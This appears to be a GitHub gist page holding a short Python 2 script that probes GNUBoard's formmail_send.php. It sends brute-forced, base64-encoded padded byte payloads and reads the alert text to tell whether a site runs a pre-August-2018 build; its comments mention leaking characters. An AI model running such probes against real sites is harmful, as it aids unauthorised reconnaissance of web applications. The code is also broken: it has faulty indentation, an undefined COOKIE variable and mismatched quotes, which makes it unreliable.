Skip to content

Instantly share code, notes, and snippets.

@stypr stypr/
Last active Mar 6, 2020

What would you like to do?
Check old GNUBoard
#!/usr/bin/python -u
#-*- coding: utf-8 -*-
import threading
import urllib2
import base64
import sys
import time
# PHPSESSID 넣어줘야합니다
HOST = "http://localhost:80"
if __name__ == "__main__":
def try_payload(n, i):
""" 글자 leak을 위한 패딩 함수 '
try_payload(n번째 바이트, 브루트포스 할 값) """
# dummy_byte 생성
dummy_byte = chr(0x01)
payload = (dummy_byte * n) + chr(i) + (dummy_byte * (31 - n))
payload += payload
return __import__("base64").b64encode(payload)
# for i in range(256):
for i in range(111, 122) + range(161, 167):
payload = try_payload(1, i)
req = urllib2.Request(HOST + '/bbs/formmail_send.php?to=' + payload)
req.add_header("Cookie", COOKIE)
req.add_header("User-Agent", "Mozilla/5.0")
resp = urllib2.urlopen(req).read()
alert_result = resp.split("<script>")[2].split("</script>")[0]
if "한번에 한사람에게만" in alert_result:
print("2018-08 이전 빌드")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.